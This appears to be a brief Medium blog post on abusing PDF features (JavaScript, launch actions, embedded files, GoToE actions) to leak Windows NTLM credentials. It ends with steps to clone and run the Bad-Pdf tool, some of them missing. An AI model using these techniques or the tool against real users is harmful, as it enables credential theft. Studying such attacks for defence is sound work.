How a pdf can be abused to steal windows credentials

  • Javascript: Adobe Reader contains a Javascript engine similar to the one which is used by web browsers, but with a slightly different API to manipulate PDF content at the end-user.
  • Launch actions: a PDF file may launch any command on the operating system, after user confirmation through a popup message. Different command lines may be specified for Windows, Unix and Mac. On Windows only, parameters can be provided for the command. Until Adobe Reader 9.3.2, the CVE-2010–1240 vulnerability made it possible to fool users by modifying the text of the popup message.
  • Embedded files: a PDF file may contain attached files, which can be extracted and opened from the reader. This trick may be used to hide malicious executables to bypass some antivirus. but Adobe Reader refuses to open embedded files if their extension is part of a blacklist, such as EXE, BAT, CMD, etc.
  • GoToE actions: a PDF file may be embedded inside another PDF file, and a GoToE action may be used so that Adobe Reader opens the embedded PDF file automatically without notifying the user. This feature may be used to hide a malicious PDF file within a normal PDF file, to fool many antivirus engines

Windows New Technology LAN Manager (NTLM)

Demonstration

  • clone the project git clone https://github.com/deepzec/Bad-Pdf.git
  • change the directory to the project folder using cd Bad.Pdf
  • list the content of the file using the command ls
  • run the code python badpadf.py
  • Run the below command to launch the tool:
here is an in-detail report on the uploaded file on virus total its display the abused properties and the metadata of the malicious file.

--

--

--

Mr Akuma | cyber security enthusiast |Secuirty Noob

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Go Llama! Hack Free Resources Generator

{UPDATE} 閃亂神樂 百花繚亂 Hack Free Resources Generator

Awesome method to secure your seed phrase

RCTF{RootersCTF WriteUps}

READ/DOWNLOAD=?

Recent regulations in the health sector

WiCYS CyberStart (Amsterdam) Challenge 2

{UPDATE} Wimmel.spiel Mysteriöse Garten Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akshay Jain

Akshay Jain

Mr Akuma | cyber security enthusiast |Secuirty Noob

More from Medium

Securing Lichess one move at a time

Student data breaches and expanded guidelines for health information

Vulnerability Assessment and Penetration to Linux OS with Nessus

Vulnerability Scanning with Metasploit